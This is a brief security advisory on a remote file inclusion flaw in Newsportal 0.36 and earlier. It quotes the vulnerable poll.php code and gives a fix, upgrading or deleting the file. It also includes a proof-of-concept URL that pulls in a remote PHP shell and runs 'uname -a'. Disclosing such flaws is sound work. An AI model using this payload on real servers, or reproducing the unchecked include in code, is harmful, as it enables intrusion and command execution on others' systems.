Newsportal <= 0.36 Remote File Inclusion Vulnerability [+] Affected Software: Newsportal <= 0.36 + register_globals=on [+] Vendor: http://florian-amrhein.de/newsportal [+] Contact. philipp.niedziela@xxxxxx [+] Vuln discovered by: Florian Amrhein [+] PoC by: Philipp Niedziela // CODE [newsportal]/extras/poll/poll.php -------------------------------------------- <? // experimental! // fills article-cache $url=explode("/",$PATH_INFO); $group=$url[1]; include "config.inc"; $title.= ' - '.$group; include "head.inc"; ?> <a name="top"></a> <h1 align="center"><?php echo $group; ?></h1> <p>Lese Overview- und Artikeldaten ein...</p> <? // -----> VULN include("$file_newsportal"); // <----- VULN $ns=OpenNNTPconnection($server,$port); flush(); if ($ns != false) { $headers = readOverview($ns,$group,1,true); closeNNTPconnection($ns); } ?> <p align="right"><a href="#top"><? echo $text_thread["button_top"];?></a></p> <? include "tail.inc"; ?> // CODE -------------------------------------------- [+] PoC: http://[url]/[pathtonewsportal]/extras/poll/poll.php?file_newsportal=http://localhost/phpshell.txt?cmd=uname -a [+] Solution: Upgrade to 0.37 || del. [newsportal]/extras/poll/poll.php [+] Greets: Lenni :)
